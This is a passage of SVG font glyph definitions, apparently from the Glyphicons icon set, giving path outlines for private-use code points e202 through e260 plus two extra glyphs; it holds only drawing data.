<glyph unicode="&#xe202;" d="M700 800h300v-380h-180v200h-340v-200h-380v755q0 10 7.5 17.5t17.5 7.5h575v-400zM1000 900h-200v200zM700 300h162l-212 -212l-212 212h162v200h100v-200zM520 0h-395q-10 0 -17.5 7.5t-7.5 17.5v395zM1000 220v-195q0 -10 -7.5 -17.5t-17.5 -7.5h-195z" />
<glyph unicode="&#xe203;" d="M700 800h300v-520l-350 350l-550 -550v1095q0 10 7.5 17.5t17.5 7.5h575v-400zM1000 900h-200v200zM862 200h-162v-200h-100v200h-162l212 212zM480 0h-355q-10 0 -17.5 7.5t-7.5 17.5v55h380v-80zM1000 80v-55q0 -10 -7.5 -17.5t-17.5 -7.5h-155v80h180z" />
<glyph unicode="&#xe204;" d="M1162 800h-162v-200h100l100 -100h-300v300h-162l212 212zM200 800h200q27 0 40 -2t29.5 -10.5t23.5 -30t7 -57.5h300v-100h-600l-200 -350v450h100q0 36 7 57.5t23.5 30t29.5 10.5t40 2zM800 400h240l-240 -400h-800l300 500h500v-100z" />
<glyph unicode="&#xe205;" d="M650 1100h100q21 0 35.5 -14.5t14.5 -35.5v-50h50q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-300q-21 0 -35.5 14.5t-14.5 35.5v100q0 21 14.5 35.5t35.5 14.5h50v50q0 21 14.5 35.5t35.5 14.5zM1000 850v150q41 0 70.5 -29.5t29.5 -70.5v-800 q0 -41 -29.5 -70.5t-70.5 -29.5h-600q-1 0 -20 4l246 246l-326 326v324q0 41 29.5 70.5t70.5 29.5v-150q0 -62 44 -106t106 -44h300q62 0 106 44t44 106zM412 250l-212 -212v162h-200v100h200v162z" />
<glyph unicode="&#xe206;" d="M450 1100h100q21 0 35.5 -14.5t14.5 -35.5v-50h50q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-300q-21 0 -35.5 14.5t-14.5 35.5v100q0 21 14.5 35.5t35.5 14.5h50v50q0 21 14.5 35.5t35.5 14.5zM800 850v150q41 0 70.5 -29.5t29.5 -70.5v-500 h-200v-300h200q0 -36 -7 -57.5t-23.5 -30t-29.5 -10.5t-40 -2h-600q-41 0 -70.5 29.5t-29.5 70.5v800q0 41 29.5 70.5t70.5 29.5v-150q0 -62 44 -106t106 -44h300q62 0 106 44t44 106zM1212 250l-212 -212v162h-200v100h200v162z" />
<glyph unicode="&#xe209;" d="M658 1197l637 -1104q23 -38 7 -65.5t-60 -27.5h-1276q-44 0 -60 27.5t7 65.5l637 1104q22 39 54 39t54 -39zM704 800h-208q-20 0 -32 -14.5t-8 -34.5l58 -302q4 -20 21.5 -34.5t37.5 -14.5h54q20 0 37.5 14.5t21.5 34.5l58 302q4 20 -8 34.5t-32 14.5zM500 300v-100h200 v100h-200z" />
<glyph unicode="&#xe210;" d="M425 1100h250q10 0 17.5 -7.5t7.5 -17.5v-150q0 -10 -7.5 -17.5t-17.5 -7.5h-250q-10 0 -17.5 7.5t-7.5 17.5v150q0 10 7.5 17.5t17.5 7.5zM425 800h250q10 0 17.5 -7.5t7.5 -17.5v-150q0 -10 -7.5 -17.5t-17.5 -7.5h-250q-10 0 -17.5 7.5t-7.5 17.5v150q0 10 7.5 17.5 t17.5 7.5zM825 800h250q10 0 17.5 -7.5t7.5 -17.5v-150q0 -10 -7.5 -17.5t-17.5 -7.5h-250q-10 0 -17.5 7.5t-7.5 17.5v150q0 10 7.5 17.5t17.5 7.5zM25 500h250q10 0 17.5 -7.5t7.5 -17.5v-150q0 -10 -7.5 -17.5t-17.5 -7.5h-250q-10 0 -17.5 7.5t-7.5 17.5v150 q0 10 7.5 17.5t17.5 7.5zM425 500h250q10 0 17.5 -7.5t7.5 -17.5v-150q0 -10 -7.5 -17.5t-17.5 -7.5h-250q-10 0 -17.5 7.5t-7.5 17.5v150q0 10 7.5 17.5t17.5 7.5zM825 500h250q10 0 17.5 -7.5t7.5 -17.5v-150q0 -10 -7.5 -17.5t-17.5 -7.5h-250q-10 0 -17.5 7.5t-7.5 17.5 v150q0 10 7.5 17.5t17.5 7.5zM25 200h250q10 0 17.5 -7.5t7.5 -17.5v-150q0 -10 -7.5 -17.5t-17.5 -7.5h-250q-10 0 -17.5 7.5t-7.5 17.5v150q0 10 7.5 17.5t17.5 7.5zM425 200h250q10 0 17.5 -7.5t7.5 -17.5v-150q0 -10 -7.5 -17.5t-17.5 -7.5h-250q-10 0 -17.5 7.5 t-7.5 17.5v150q0 10 7.5 17.5t17.5 7.5zM825 200h250q10 0 17.5 -7.5t7.5 -17.5v-150q0 -10 -7.5 -17.5t-17.5 -7.5h-250q-10 0 -17.5 7.5t-7.5 17.5v150q0 10 7.5 17.5t17.5 7.5z" />
<glyph unicode="&#xe211;" d="M700 1200h100v-200h-100v-100h350q62 0 86.5 -39.5t-3.5 -94.5l-66 -132q-41 -83 -81 -134h-772q-40 51 -81 134l-66 132q-28 55 -3.5 94.5t86.5 39.5h350v100h-100v200h100v100h200v-100zM250 400h700q21 0 35.5 -14.5t14.5 -35.5t-14.5 -35.5t-35.5 -14.5h-12l137 -100 h-950l138 100h-13q-21 0 -35.5 14.5t-14.5 35.5t14.5 35.5t35.5 14.5zM50 100h1100q21 0 35.5 -14.5t14.5 -35.5v-50h-1200v50q0 21 14.5 35.5t35.5 14.5z" />
<glyph unicode="&#xe212;" d="M600 1300q40 0 68.5 -29.5t28.5 -70.5h-194q0 41 28.5 70.5t68.5 29.5zM443 1100h314q18 -37 18 -75q0 -8 -3 -25h328q41 0 44.5 -16.5t-30.5 -38.5l-175 -145h-678l-178 145q-34 22 -29 38.5t46 16.5h328q-3 17 -3 25q0 38 18 75zM250 700h700q21 0 35.5 -14.5 t14.5 -35.5t-14.5 -35.5t-35.5 -14.5h-150v-200l275 -200h-950l275 200v200h-150q-21 0 -35.5 14.5t-14.5 35.5t14.5 35.5t35.5 14.5zM50 100h1100q21 0 35.5 -14.5t14.5 -35.5v-50h-1200v50q0 21 14.5 35.5t35.5 14.5z" />
<glyph unicode="&#xe213;" d="M600 1181q75 0 128 -53t53 -128t-53 -128t-128 -53t-128 53t-53 128t53 128t128 53zM602 798h46q34 0 55.5 -28.5t21.5 -86.5q0 -76 39 -183h-324q39 107 39 183q0 58 21.5 86.5t56.5 28.5h45zM250 400h700q21 0 35.5 -14.5t14.5 -35.5t-14.5 -35.5t-35.5 -14.5h-13 l138 -100h-950l137 100h-12q-21 0 -35.5 14.5t-14.5 35.5t14.5 35.5t35.5 14.5zM50 100h1100q21 0 35.5 -14.5t14.5 -35.5v-50h-1200v50q0 21 14.5 35.5t35.5 14.5z" />
<glyph unicode="&#xe214;" d="M600 1300q47 0 92.5 -53.5t71 -123t25.5 -123.5q0 -78 -55.5 -133.5t-133.5 -55.5t-133.5 55.5t-55.5 133.5q0 62 34 143l144 -143l111 111l-163 163q34 26 63 26zM602 798h46q34 0 55.5 -28.5t21.5 -86.5q0 -76 39 -183h-324q39 107 39 183q0 58 21.5 86.5t56.5 28.5h45 zM250 400h700q21 0 35.5 -14.5t14.5 -35.5t-14.5 -35.5t-35.5 -14.5h-13l138 -100h-950l137 100h-12q-21 0 -35.5 14.5t-14.5 35.5t14.5 35.5t35.5 14.5zM50 100h1100q21 0 35.5 -14.5t14.5 -35.5v-50h-1200v50q0 21 14.5 35.5t35.5 14.5z" />
<glyph unicode="&#xe215;" d="M600 1200l300 -161v-139h-300q0 -57 18.5 -108t50 -91.5t63 -72t70 -67.5t57.5 -61h-530q-60 83 -90.5 177.5t-30.5 178.5t33 164.5t87.5 139.5t126 96.5t145.5 41.5v-98zM250 400h700q21 0 35.5 -14.5t14.5 -35.5t-14.5 -35.5t-35.5 -14.5h-13l138 -100h-950l137 100 h-12q-21 0 -35.5 14.5t-14.5 35.5t14.5 35.5t35.5 14.5zM50 100h1100q21 0 35.5 -14.5t14.5 -35.5v-50h-1200v50q0 21 14.5 35.5t35.5 14.5z" />
<glyph unicode="&#xe216;" d="M600 1300q41 0 70.5 -29.5t29.5 -70.5v-78q46 -26 73 -72t27 -100v-50h-400v50q0 54 27 100t73 72v78q0 41 29.5 70.5t70.5 29.5zM400 800h400q54 0 100 -27t72 -73h-172v-100h200v-100h-200v-100h200v-100h-200v-100h200q0 -83 -58.5 -141.5t-141.5 -58.5h-400 q-83 0 -141.5 58.5t-58.5 141.5v400q0 83 58.5 141.5t141.5 58.5z" />
<glyph unicode="&#xe218;" d="M150 1100h900q21 0 35.5 -14.5t14.5 -35.5v-500q0 -21 -14.5 -35.5t-35.5 -14.5h-900q-21 0 -35.5 14.5t-14.5 35.5v500q0 21 14.5 35.5t35.5 14.5zM125 400h950q10 0 17.5 -7.5t7.5 -17.5v-50q0 -10 -7.5 -17.5t-17.5 -7.5h-283l224 -224q13 -13 13 -31.5t-13 -32 t-31.5 -13.5t-31.5 13l-88 88h-524l-87 -88q-13 -13 -32 -13t-32 13.5t-13 32t13 31.5l224 224h-289q-10 0 -17.5 7.5t-7.5 17.5v50q0 10 7.5 17.5t17.5 7.5zM541 300l-100 -100h324l-100 100h-124z" />
<glyph unicode="&#xe219;" d="M200 1100h800q83 0 141.5 -58.5t58.5 -141.5v-200h-100q0 41 -29.5 70.5t-70.5 29.5h-250q-41 0 -70.5 -29.5t-29.5 -70.5h-100q0 41 -29.5 70.5t-70.5 29.5h-250q-41 0 -70.5 -29.5t-29.5 -70.5h-100v200q0 83 58.5 141.5t141.5 58.5zM100 600h1000q41 0 70.5 -29.5 t29.5 -70.5v-300h-1200v300q0 41 29.5 70.5t70.5 29.5zM300 100v-50q0 -21 -14.5 -35.5t-35.5 -14.5h-100q-21 0 -35.5 14.5t-14.5 35.5v50h200zM1100 100v-50q0 -21 -14.5 -35.5t-35.5 -14.5h-100q-21 0 -35.5 14.5t-14.5 35.5v50h200z" />
<glyph unicode="&#xe221;" d="M480 1165l682 -683q31 -31 31 -75.5t-31 -75.5l-131 -131h-481l-517 518q-32 31 -32 75.5t32 75.5l295 296q31 31 75.5 31t76.5 -31zM108 794l342 -342l303 304l-341 341zM250 100h800q21 0 35.5 -14.5t14.5 -35.5v-50h-900v50q0 21 14.5 35.5t35.5 14.5z" />
<glyph unicode="&#xe223;" d="M1057 647l-189 506q-8 19 -27.5 33t-40.5 14h-400q-21 0 -40.5 -14t-27.5 -33l-189 -506q-8 -19 1.5 -33t30.5 -14h625v-150q0 -21 14.5 -35.5t35.5 -14.5t35.5 14.5t14.5 35.5v150h125q21 0 30.5 14t1.5 33zM897 0h-595v50q0 21 14.5 35.5t35.5 14.5h50v50 q0 21 14.5 35.5t35.5 14.5h48v300h200v-300h47q21 0 35.5 -14.5t14.5 -35.5v-50h50q21 0 35.5 -14.5t14.5 -35.5v-50z" />
<glyph unicode="&#xe224;" d="M900 800h300v-575q0 -10 -7.5 -17.5t-17.5 -7.5h-375v591l-300 300v84q0 10 7.5 17.5t17.5 7.5h375v-400zM1200 900h-200v200zM400 600h300v-575q0 -10 -7.5 -17.5t-17.5 -7.5h-650q-10 0 -17.5 7.5t-7.5 17.5v950q0 10 7.5 17.5t17.5 7.5h375v-400zM700 700h-200v200z " />
<glyph unicode="&#xe225;" d="M484 1095h195q75 0 146 -32.5t124 -86t89.5 -122.5t48.5 -142q18 -14 35 -20q31 -10 64.5 6.5t43.5 48.5q10 34 -15 71q-19 27 -9 43q5 8 12.5 11t19 -1t23.5 -16q41 -44 39 -105q-3 -63 -46 -106.5t-104 -43.5h-62q-7 -55 -35 -117t-56 -100l-39 -234q-3 -20 -20 -34.5 t-38 -14.5h-100q-21 0 -33 14.5t-9 34.5l12 70q-49 -14 -91 -14h-195q-24 0 -65 8l-11 -64q-3 -20 -20 -34.5t-38 -14.5h-100q-21 0 -33 14.5t-9 34.5l26 157q-84 74 -128 175l-159 53q-19 7 -33 26t-14 40v50q0 21 14.5 35.5t35.5 14.5h124q11 87 56 166l-111 95 q-16 14 -12.5 23.5t24.5 9.5h203q116 101 250 101zM675 1000h-250q-10 0 -17.5 -7.5t-7.5 -17.5v-50q0 -10 7.5 -17.5t17.5 -7.5h250q10 0 17.5 7.5t7.5 17.5v50q0 10 -7.5 17.5t-17.5 7.5z" />
<glyph unicode="&#xe226;" d="M641 900l423 247q19 8 42 2.5t37 -21.5l32 -38q14 -15 12.5 -36t-17.5 -34l-139 -120h-390zM50 1100h106q67 0 103 -17t66 -71l102 -212h823q21 0 35.5 -14.5t14.5 -35.5v-50q0 -21 -14 -40t-33 -26l-737 -132q-23 -4 -40 6t-26 25q-42 67 -100 67h-300q-62 0 -106 44 t-44 106v200q0 62 44 106t106 44zM173 928h-80q-19 0 -28 -14t-9 -35v-56q0 -51 42 -51h134q16 0 21.5 8t5.5 24q0 11 -16 45t-27 51q-18 28 -43 28zM550 727q-32 0 -54.5 -22.5t-22.5 -54.5t22.5 -54.5t54.5 -22.5t54.5 22.5t22.5 54.5t-22.5 54.5t-54.5 22.5zM130 389 l152 130q18 19 34 24t31 -3.5t24.5 -17.5t25.5 -28q28 -35 50.5 -51t48.5 -13l63 5l48 -179q13 -61 -3.5 -97.5t-67.5 -79.5l-80 -69q-47 -40 -109 -35.5t-103 51.5l-130 151q-40 47 -35.5 109.5t51.5 102.5zM380 377l-102 -88q-31 -27 2 -65l37 -43q13 -15 27.5 -19.5 t31.5 6.5l61 53q19 16 14 49q-2 20 -12 56t-17 45q-11 12 -19 14t-23 -8z" />
<glyph unicode="&#xe227;" d="M625 1200h150q10 0 17.5 -7.5t7.5 -17.5v-109q79 -33 131 -87.5t53 -128.5q1 -46 -15 -84.5t-39 -61t-46 -38t-39 -21.5l-17 -6q6 0 15 -1.5t35 -9t50 -17.5t53 -30t50 -45t35.5 -64t14.5 -84q0 -59 -11.5 -105.5t-28.5 -76.5t-44 -51t-49.5 -31.5t-54.5 -16t-49.5 -6.5 t-43.5 -1v-75q0 -10 -7.5 -17.5t-17.5 -7.5h-150q-10 0 -17.5 7.5t-7.5 17.5v75h-100v-75q0 -10 -7.5 -17.5t-17.5 -7.5h-150q-10 0 -17.5 7.5t-7.5 17.5v75h-175q-10 0 -17.5 7.5t-7.5 17.5v150q0 10 7.5 17.5t17.5 7.5h75v600h-75q-10 0 -17.5 7.5t-7.5 17.5v150 q0 10 7.5 17.5t17.5 7.5h175v75q0 10 7.5 17.5t17.5 7.5h150q10 0 17.5 -7.5t7.5 -17.5v-75h100v75q0 10 7.5 17.5t17.5 7.5zM400 900v-200h263q28 0 48.5 10.5t30 25t15 29t5.5 25.5l1 10q0 4 -0.5 11t-6 24t-15 30t-30 24t-48.5 11h-263zM400 500v-200h363q28 0 48.5 10.5 t30 25t15 29t5.5 25.5l1 10q0 4 -0.5 11t-6 24t-15 30t-30 24t-48.5 11h-363z" />
<glyph unicode="&#xe230;" d="M212 1198h780q86 0 147 -61t61 -147v-416q0 -51 -18 -142.5t-36 -157.5l-18 -66q-29 -87 -93.5 -146.5t-146.5 -59.5h-572q-82 0 -147 59t-93 147q-8 28 -20 73t-32 143.5t-20 149.5v416q0 86 61 147t147 61zM600 1045q-70 0 -132.5 -11.5t-105.5 -30.5t-78.5 -41.5 t-57 -45t-36 -41t-20.5 -30.5l-6 -12l156 -243h560l156 243q-2 5 -6 12.5t-20 29.5t-36.5 42t-57 44.5t-79 42t-105 29.5t-132.5 12zM762 703h-157l195 261z" />
<glyph unicode="&#xe231;" d="M475 1300h150q103 0 189 -86t86 -189v-500q0 -41 -42 -83t-83 -42h-450q-41 0 -83 42t-42 83v500q0 103 86 189t189 86zM700 300v-225q0 -21 -27 -48t-48 -27h-150q-21 0 -48 27t-27 48v225h300z" />
<glyph unicode="&#xe232;" d="M475 1300h96q0 -150 89.5 -239.5t239.5 -89.5v-446q0 -41 -42 -83t-83 -42h-450q-41 0 -83 42t-42 83v500q0 103 86 189t189 86zM700 300v-225q0 -21 -27 -48t-48 -27h-150q-21 0 -48 27t-27 48v225h300z" />
<glyph unicode="&#xe233;" d="M1294 767l-638 -283l-378 170l-78 -60v-224l100 -150v-199l-150 148l-150 -149v200l100 150v250q0 4 -0.5 10.5t0 9.5t1 8t3 8t6.5 6l47 40l-147 65l642 283zM1000 380l-350 -166l-350 166v147l350 -165l350 165v-147z" />
<glyph unicode="&#xe234;" d="M250 800q62 0 106 -44t44 -106t-44 -106t-106 -44t-106 44t-44 106t44 106t106 44zM650 800q62 0 106 -44t44 -106t-44 -106t-106 -44t-106 44t-44 106t44 106t106 44zM1050 800q62 0 106 -44t44 -106t-44 -106t-106 -44t-106 44t-44 106t44 106t106 44z" />
<glyph unicode="&#xe235;" d="M550 1100q62 0 106 -44t44 -106t-44 -106t-106 -44t-106 44t-44 106t44 106t106 44zM550 700q62 0 106 -44t44 -106t-44 -106t-106 -44t-106 44t-44 106t44 106t106 44zM550 300q62 0 106 -44t44 -106t-44 -106t-106 -44t-106 44t-44 106t44 106t106 44z" />
<glyph unicode="&#xe236;" d="M125 1100h950q10 0 17.5 -7.5t7.5 -17.5v-150q0 -10 -7.5 -17.5t-17.5 -7.5h-950q-10 0 -17.5 7.5t-7.5 17.5v150q0 10 7.5 17.5t17.5 7.5zM125 700h950q10 0 17.5 -7.5t7.5 -17.5v-150q0 -10 -7.5 -17.5t-17.5 -7.5h-950q-10 0 -17.5 7.5t-7.5 17.5v150q0 10 7.5 17.5 t17.5 7.5zM125 300h950q10 0 17.5 -7.5t7.5 -17.5v-150q0 -10 -7.5 -17.5t-17.5 -7.5h-950q-10 0 -17.5 7.5t-7.5 17.5v150q0 10 7.5 17.5t17.5 7.5z" />
<glyph unicode="&#xe237;" d="M350 1200h500q162 0 256 -93.5t94 -256.5v-500q0 -165 -93.5 -257.5t-256.5 -92.5h-500q-165 0 -257.5 92.5t-92.5 257.5v500q0 165 92.5 257.5t257.5 92.5zM900 1000h-600q-41 0 -70.5 -29.5t-29.5 -70.5v-600q0 -41 29.5 -70.5t70.5 -29.5h600q41 0 70.5 29.5 t29.5 70.5v600q0 41 -29.5 70.5t-70.5 29.5zM350 900h500q21 0 35.5 -14.5t14.5 -35.5v-300q0 -21 -14.5 -35.5t-35.5 -14.5h-500q-21 0 -35.5 14.5t-14.5 35.5v300q0 21 14.5 35.5t35.5 14.5zM400 800v-200h400v200h-400z" />
<glyph unicode="&#xe238;" d="M150 1100h1000q21 0 35.5 -14.5t14.5 -35.5t-14.5 -35.5t-35.5 -14.5h-50v-200h50q21 0 35.5 -14.5t14.5 -35.5t-14.5 -35.5t-35.5 -14.5h-50v-200h50q21 0 35.5 -14.5t14.5 -35.5t-14.5 -35.5t-35.5 -14.5h-50v-200h50q21 0 35.5 -14.5t14.5 -35.5t-14.5 -35.5 t-35.5 -14.5h-1000q-21 0 -35.5 14.5t-14.5 35.5t14.5 35.5t35.5 14.5h50v200h-50q-21 0 -35.5 14.5t-14.5 35.5t14.5 35.5t35.5 14.5h50v200h-50q-21 0 -35.5 14.5t-14.5 35.5t14.5 35.5t35.5 14.5h50v200h-50q-21 0 -35.5 14.5t-14.5 35.5t14.5 35.5t35.5 14.5z" />
<glyph unicode="&#xe239;" d="M650 1187q87 -67 118.5 -156t0 -178t-118.5 -155q-87 66 -118.5 155t0 178t118.5 156zM300 800q124 0 212 -88t88 -212q-124 0 -212 88t-88 212zM1000 800q0 -124 -88 -212t-212 -88q0 124 88 212t212 88zM300 500q124 0 212 -88t88 -212q-124 0 -212 88t-88 212z M1000 500q0 -124 -88 -212t-212 -88q0 124 88 212t212 88zM700 199v-144q0 -21 -14.5 -35.5t-35.5 -14.5t-35.5 14.5t-14.5 35.5v142q40 -4 43 -4q17 0 57 6z" />
<glyph unicode="&#xe240;" d="M745 878l69 19q25 6 45 -12l298 -295q11 -11 15 -26.5t-2 -30.5q-5 -14 -18 -23.5t-28 -9.5h-8q1 0 1 -13q0 -29 -2 -56t-8.5 -62t-20 -63t-33 -53t-51 -39t-72.5 -14h-146q-184 0 -184 288q0 24 10 47q-20 4 -62 4t-63 -4q11 -24 11 -47q0 -288 -184 -288h-142 q-48 0 -84.5 21t-56 51t-32 71.5t-16 75t-3.5 68.5q0 13 2 13h-7q-15 0 -27.5 9.5t-18.5 23.5q-6 15 -2 30.5t15 25.5l298 296q20 18 46 11l76 -19q20 -5 30.5 -22.5t5.5 -37.5t-22.5 -31t-37.5 -5l-51 12l-182 -193h891l-182 193l-44 -12q-20 -5 -37.5 6t-22.5 31t6 37.5 t31 22.5z" />
<glyph unicode="&#xe241;" d="M1200 900h-50q0 21 -4 37t-9.5 26.5t-18 17.5t-22 11t-28.5 5.5t-31 2t-37 0.5h-200v-850q0 -22 25 -34.5t50 -13.5l25 -2v-100h-400v100q4 0 11 0.5t24 3t30 7t24 15t11 24.5v850h-200q-25 0 -37 -0.5t-31 -2t-28.5 -5.5t-22 -11t-18 -17.5t-9.5 -26.5t-4 -37h-50v300 h1000v-300zM500 450h-25q0 15 -4 24.5t-9 14.5t-17 7.5t-20 3t-25 0.5h-100v-425q0 -11 12.5 -17.5t25.5 -7.5h12v-50h-200v50q50 0 50 25v425h-100q-17 0 -25 -0.5t-20 -3t-17 -7.5t-9 -14.5t-4 -24.5h-25v150h500v-150z" />
<glyph unicode="&#xe242;" d="M1000 300v50q-25 0 -55 32q-14 14 -25 31t-16 27l-4 11l-289 747h-69l-300 -754q-18 -35 -39 -56q-9 -9 -24.5 -18.5t-26.5 -14.5l-11 -5v-50h273v50q-49 0 -78.5 21.5t-11.5 67.5l69 176h293l61 -166q13 -34 -3.5 -66.5t-55.5 -32.5v-50h312zM412 691l134 342l121 -342 h-255zM1100 150v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-1000q-21 0 -35.5 14.5t-14.5 35.5v100q0 21 14.5 35.5t35.5 14.5h1000q21 0 35.5 -14.5t14.5 -35.5z" />
<glyph unicode="&#xe243;" d="M50 1200h1100q21 0 35.5 -14.5t14.5 -35.5v-1100q0 -21 -14.5 -35.5t-35.5 -14.5h-1100q-21 0 -35.5 14.5t-14.5 35.5v1100q0 21 14.5 35.5t35.5 14.5zM611 1118h-70q-13 0 -18 -12l-299 -753q-17 -32 -35 -51q-18 -18 -56 -34q-12 -5 -12 -18v-50q0 -8 5.5 -14t14.5 -6 h273q8 0 14 6t6 14v50q0 8 -6 14t-14 6q-55 0 -71 23q-10 14 0 39l63 163h266l57 -153q11 -31 -6 -55q-12 -17 -36 -17q-8 0 -14 -6t-6 -14v-50q0 -8 6 -14t14 -6h313q8 0 14 6t6 14v50q0 7 -5.5 13t-13.5 7q-17 0 -42 25q-25 27 -40 63h-1l-288 748q-5 12 -19 12zM639 611 h-197l103 264z" />
<glyph unicode="&#xe244;" d="M1200 1100h-1200v100h1200v-100zM50 1000h400q21 0 35.5 -14.5t14.5 -35.5v-900q0 -21 -14.5 -35.5t-35.5 -14.5h-400q-21 0 -35.5 14.5t-14.5 35.5v900q0 21 14.5 35.5t35.5 14.5zM650 1000h400q21 0 35.5 -14.5t14.5 -35.5v-400q0 -21 -14.5 -35.5t-35.5 -14.5h-400 q-21 0 -35.5 14.5t-14.5 35.5v400q0 21 14.5 35.5t35.5 14.5zM700 900v-300h300v300h-300z" />
<glyph unicode="&#xe245;" d="M50 1200h400q21 0 35.5 -14.5t14.5 -35.5v-900q0 -21 -14.5 -35.5t-35.5 -14.5h-400q-21 0 -35.5 14.5t-14.5 35.5v900q0 21 14.5 35.5t35.5 14.5zM650 700h400q21 0 35.5 -14.5t14.5 -35.5v-400q0 -21 -14.5 -35.5t-35.5 -14.5h-400q-21 0 -35.5 14.5t-14.5 35.5v400 q0 21 14.5 35.5t35.5 14.5zM700 600v-300h300v300h-300zM1200 0h-1200v100h1200v-100z" />
<glyph unicode="&#xe246;" d="M50 1000h400q21 0 35.5 -14.5t14.5 -35.5v-350h100v150q0 21 14.5 35.5t35.5 14.5h400q21 0 35.5 -14.5t14.5 -35.5v-150h100v-100h-100v-150q0 -21 -14.5 -35.5t-35.5 -14.5h-400q-21 0 -35.5 14.5t-14.5 35.5v150h-100v-350q0 -21 -14.5 -35.5t-35.5 -14.5h-400 q-21 0 -35.5 14.5t-14.5 35.5v800q0 21 14.5 35.5t35.5 14.5zM700 700v-300h300v300h-300z" />
<glyph unicode="&#xe247;" d="M100 0h-100v1200h100v-1200zM250 1100h400q21 0 35.5 -14.5t14.5 -35.5v-400q0 -21 -14.5 -35.5t-35.5 -14.5h-400q-21 0 -35.5 14.5t-14.5 35.5v400q0 21 14.5 35.5t35.5 14.5zM300 1000v-300h300v300h-300zM250 500h900q21 0 35.5 -14.5t14.5 -35.5v-400 q0 -21 -14.5 -35.5t-35.5 -14.5h-900q-21 0 -35.5 14.5t-14.5 35.5v400q0 21 14.5 35.5t35.5 14.5z" />
<glyph unicode="&#xe248;" d="M600 1100h150q21 0 35.5 -14.5t14.5 -35.5v-400q0 -21 -14.5 -35.5t-35.5 -14.5h-150v-100h450q21 0 35.5 -14.5t14.5 -35.5v-400q0 -21 -14.5 -35.5t-35.5 -14.5h-900q-21 0 -35.5 14.5t-14.5 35.5v400q0 21 14.5 35.5t35.5 14.5h350v100h-150q-21 0 -35.5 14.5 t-14.5 35.5v400q0 21 14.5 35.5t35.5 14.5h150v100h100v-100zM400 1000v-300h300v300h-300z" />
<glyph unicode="&#xe249;" d="M1200 0h-100v1200h100v-1200zM550 1100h400q21 0 35.5 -14.5t14.5 -35.5v-400q0 -21 -14.5 -35.5t-35.5 -14.5h-400q-21 0 -35.5 14.5t-14.5 35.5v400q0 21 14.5 35.5t35.5 14.5zM600 1000v-300h300v300h-300zM50 500h900q21 0 35.5 -14.5t14.5 -35.5v-400 q0 -21 -14.5 -35.5t-35.5 -14.5h-900q-21 0 -35.5 14.5t-14.5 35.5v400q0 21 14.5 35.5t35.5 14.5z" />
<glyph unicode="&#xe250;" d="M865 565l-494 -494q-23 -23 -41 -23q-14 0 -22 13.5t-8 38.5v1000q0 25 8 38.5t22 13.5q18 0 41 -23l494 -494q14 -14 14 -35t-14 -35z" />
<glyph unicode="&#xe251;" d="M335 635l494 494q29 29 50 20.5t21 -49.5v-1000q0 -41 -21 -49.5t-50 20.5l-494 494q-14 14 -14 35t14 35z" />
<glyph unicode="&#xe252;" d="M100 900h1000q41 0 49.5 -21t-20.5 -50l-494 -494q-14 -14 -35 -14t-35 14l-494 494q-29 29 -20.5 50t49.5 21z" />
<glyph unicode="&#xe253;" d="M635 865l494 -494q29 -29 20.5 -50t-49.5 -21h-1000q-41 0 -49.5 21t20.5 50l494 494q14 14 35 14t35 -14z" />
<glyph unicode="&#xe254;" d="M700 741v-182l-692 -323v221l413 193l-413 193v221zM1200 0h-800v200h800v-200z" />
<glyph unicode="&#xe255;" d="M1200 900h-200v-100h200v-100h-300v300h200v100h-200v100h300v-300zM0 700h50q0 21 4 37t9.5 26.5t18 17.5t22 11t28.5 5.5t31 2t37 0.5h100v-550q0 -22 -25 -34.5t-50 -13.5l-25 -2v-100h400v100q-4 0 -11 0.5t-24 3t-30 7t-24 15t-11 24.5v550h100q25 0 37 -0.5t31 -2 t28.5 -5.5t22 -11t18 -17.5t9.5 -26.5t4 -37h50v300h-800v-300z" />
<glyph unicode="&#xe256;" d="M800 700h-50q0 21 -4 37t-9.5 26.5t-18 17.5t-22 11t-28.5 5.5t-31 2t-37 0.5h-100v-550q0 -22 25 -34.5t50 -14.5l25 -1v-100h-400v100q4 0 11 0.5t24 3t30 7t24 15t11 24.5v550h-100q-25 0 -37 -0.5t-31 -2t-28.5 -5.5t-22 -11t-18 -17.5t-9.5 -26.5t-4 -37h-50v300 h800v-300zM1100 200h-200v-100h200v-100h-300v300h200v100h-200v100h300v-300z" />
<glyph unicode="&#xe257;" d="M701 1098h160q16 0 21 -11t-7 -23l-464 -464l464 -464q12 -12 7 -23t-21 -11h-160q-13 0 -23 9l-471 471q-7 8 -7 18t7 18l471 471q10 9 23 9z" />
<glyph unicode="&#xe258;" d="M339 1098h160q13 0 23 -9l471 -471q7 -8 7 -18t-7 -18l-471 -471q-10 -9 -23 -9h-160q-16 0 -21 11t7 23l464 464l-464 464q-12 12 -7 23t21 11z" />
<glyph unicode="&#xe259;" d="M1087 882q11 -5 11 -21v-160q0 -13 -9 -23l-471 -471q-8 -7 -18 -7t-18 7l-471 471q-9 10 -9 23v160q0 16 11 21t23 -7l464 -464l464 464q12 12 23 7z" />
<glyph unicode="&#xe260;" d="M618 993l471 -471q9 -10 9 -23v-160q0 -16 -11 -21t-23 7l-464 464l-464 -464q-12 -12 -23 -7t-11 21v160q0 13 9 23l471 471q8 7 18 7t18 -7z" />
<glyph unicode="&#xf8ff;" d="M1000 1200q0 -124 -88 -212t-212 -88q0 124 88 212t212 88zM450 1000h100q21 0 40 -14t26 -33l79 -194q5 1 16 3q34 6 54 9.5t60 7t65.5 1t61 -10t56.5 -23t42.5 -42t29 -64t5 -92t-19.5 -121.5q-1 -7 -3 -19.5t-11 -50t-20.5 -73t-32.5 -81.5t-46.5 -83t-64 -70 t-82.5 -50q-13 -5 -42 -5t-65.5 2.5t-47.5 2.5q-14 0 -49.5 -3.5t-63 -3.5t-43.5 7q-57 25 -104.5 78.5t-75 111.5t-46.5 112t-26 90l-7 35q-15 63 -18 115t4.5 88.5t26 64t39.5 43.5t52 25.5t58.5 13t62.5 2t59.5 -4.5t55.5 -8l-147 192q-12 18 -5.5 30t27.5 12z" />
<glyph unicode="&#x1f511;" d="M250 1200h600q21 0 35.5 -14.5t14.5 -35.5v-400q0 -21 -14.5 -35.5t-35.5 -14.5h-150v-500l-255 -178q-19 -9 -32 -1t-13 29v650h-150q-21 0 -35.5 14.5t-14.5 35.5v400q0 21 14.5 35.5t35.5 14.5zM400 1100v-100h300v100h-300z" />
